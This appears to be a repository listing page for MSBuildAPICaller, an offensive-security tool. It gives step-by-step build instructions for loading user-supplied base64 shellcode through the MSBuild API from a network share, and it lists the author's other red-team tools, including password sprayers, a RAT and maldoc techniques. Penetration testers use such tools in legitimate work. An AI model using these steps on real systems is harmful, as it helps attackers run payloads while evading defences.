rvrsh3ll/MSBuildAPICaller

Stars
155
Rank 233,342 (Top 5 %)
Language
C#
License
BSD 3-Clause "New...
Created over 4 years ago
Updated over 3 years ago

rvrsh3ll/MSBuildAPICaller

rvrsh3ll

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

MSBuild Without MSBuild.exe

An updated version of this project resides at https://github.com/rvrsh3ll/NoMSBuild

MSBuildAPICaller

MSBuild Without MSBuild.exe

How to build and execute

Step 1: Build IEShim.cs

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe /reference:"Microsoft.Build.Framework.dll";"Microsoft.Build.Tasks.v4.0.dll";"Microsoft.Build.Utilities.v4.0.dll" /target:library IEShim.cs

Step 2: Modify "projectPath" variable on line 60 of msbuildapicaller.cs to your needs

Example: string projectPath = '\\192.168.1.100\share\msbuildapicaller.csproj';

Step 3: Replace with your base64 encoded x64 shellcode in msbuildapicaller.csproj

Step 4: Replace AssemblyFile variable with the location of your compiled dll from step 1

Step 5: Build msbuildapicaller.cs

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe /reference:"Microsoft.Build.Framework.dll";"Microsoft.Build.dll";"Microsoft.Build.Engine.dll";"Microsoft.Build.Utilities.v4.0.dll";"System.Runtime.dll" /target:exe msbuildapicaller.cs

Step 6: Execute msbuildapicaller.exe

Misc-Powershell-Scripts

FindFrontableDomains

Search for potential frontable domains

TokenTactics

Azure JWT Token Manipulation Toolset

BOF_Collection

Various Cobalt Strike BOFs

CPLResourceRunner

Run shellcode from resource

Rubeus-Rundll32

Run Rubeus via Rundll32

SharpPrinter

Discover Printers

SharpSMBSpray

Spray a hash via smb to check for local administrator access

NoMSBuild

MSBuild without MSbuild.exe

SharpCOM

CSHARP DCOM Fun

SharpExcel4-DCOM

Port of Invoke-Excel4DCOM

Azure-App-Tools

Collection of tools to use with Azure Applications

Word-Doc-Video-Embed-EXE-POC

SharpFruit

A C# penetration testing tool to discover low-haning web fruit via web requests.

RendezvousRAT

Self-healing RAT utilizing libp2p

MimeSpray

MimeCast Password Spraying Tool

CrypoCurrencyPowerShell

FlaskRedirectorProtector

Protect your servers with a secret header

MSSQLUDPScanner

Discover MSSQL Instances via UDP Scanning

HashCant

Some Hashcat Rules for 2020 and beyond. Contributions encouraged!

PELoader

Load PE via XML Attribute

OSGiScanner

Scan for OSGi Consoles

SharpSSDP

SSDP Service Discovery

UACSilentCleanup

Carnac

Carnac The Magnificent: Pancakeswap Prediction Market Bot

eavesarp

Analyze ARP requests to identify hosts that are communicating with one another.

SharpEdge

C# Implementation of Get-VaultCredential

FindIngressEmail

Find Inbound Email Domains

Armitage-Cortana-Resource-Opener

Open Resource Files in Armitage with Cortana

CanaryServer

Fake SMB and SAMR data

POSH-Commander

Invoke remote powershell scripts in memory of compromised hosts.

ADEnum

Active Directory Enumeration Tool

SkiDzEX

A modded version of ConfuserEx | SkiDzEx

OracleCommander

Oracle Commander

X-Commander

MySQLlX Multitool

BeaconSMS

Set Cobalt Strike Beacons to SMS you upon arrival.

Posh-Runas

azure_scripts

Scripts for attacking azure

glorious-wizard

rvrsh3ll

MalDoc-Embedded-EXE-Bin-

This is a technique one can use for their MalDoc.

Visual Basic .NET

rvrsh3ll.github.io